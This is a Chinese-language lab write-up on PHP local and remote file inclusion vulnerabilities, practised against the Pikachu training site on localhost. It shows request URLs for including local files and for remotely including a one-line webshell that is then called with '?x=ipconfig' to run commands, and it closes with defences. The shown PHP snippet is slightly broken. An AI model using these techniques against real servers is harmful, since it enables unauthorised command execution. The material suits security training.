WebWall-07.File Inclusion(文件包含)

概述

​ 文件包含，是一个功能。在各种开发语言中都提供了内置的文件包含函数，其可以使开发人员在一个代码文件中直 接包含（引入）另外一个代码文件。 比如 在PHP中，提供了： include(),include_once() require(),require_once() 这些文件包含函数，这些函数在代码设计中被经常使用到。

​ 大多数情况下，文件包含函数中包含的代码文件是固定的，因此也不会出现安全问题。 但是，有些时候，文件包含 的代码文件被写成了一个变量，且这个变量可以由前端用户传进来，这种情况下，如果没有做足够的安全考虑，则 可能会引发文件包含漏洞。 攻击着会指定一个“意想不到”的文件让包含函数去执行，从而造成恶意操作。 根据不同 的配置环境，文件包含漏洞分为如下两种情况：

1. 本地文件包含漏洞：仅能够对服务器本地的文件进行包含，由于 服务器上的文件并不是攻击者所能够控制的，因此该情况下，攻击着更多的会包含一些 固定的系统配置文件，从而 读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞，从而形成更大的威力。
2. 远程文 件包含漏洞：能够通过url地址对远程的文件进行包含，这意味着攻击者可以传入任意的代码，这种情况没啥好说 的，准备挂彩。 但RFI的利用条件较为苛刻，需要php.ini中进行配置

但RFI的利用条件较为苛刻，需要php.ini中进行配置

allow_url_fopen = On
allow_url_include = On
1
2

两个配置选项均需要为On，才能远程包含文件成功。

但是，在php.ini中，allow_url_fopen默认一直是On，而allow_url_include从php5.2之后就默认为Off。 所以远程文件包含的利用条件比较苛刻.

测试实验

local 漏洞

正常提交

http://127.0.0.1/pikachu/vul/fileinclude/fi_local.php?filename=file1.php&submit=%E6%8F%90%E4%BA%A4
1

这里进行修改

可以寻找正确的路径打开对应的本地文件

remote漏洞

首先在一台服务器上面把下面的代码运行起来

##远程文件##
<?php
$myfile fopen("test.php","w");
$txt = '';
fwrite($myfile,$txt);
fclose($myfile);
?>
1
2
3
4
5
6
7

执行之前

然后执行远程文件

http://127.0.0.1/pikachu/vul/fileinclude/fi_remote.php?filename=http://127.0.0.1/pikachu/test/yijuhua.txt&submit=%E6%8F%90%E4%BA%A4
1

执行之后

后面就可以调用非法命令了

http://127.0.0.1/pikachu/vul/fileinclude/yijuhua.php?x=ipconfig
1

防范措施

1. 过滤各种 ../../,http://,https://
2. 配置

allow_url_fopen = off
allow_url_include = off
magic_quotes_gpc=on
1
2
3

3. 通过白名单策略，仅允许包含运行指定的文件，其他的都禁止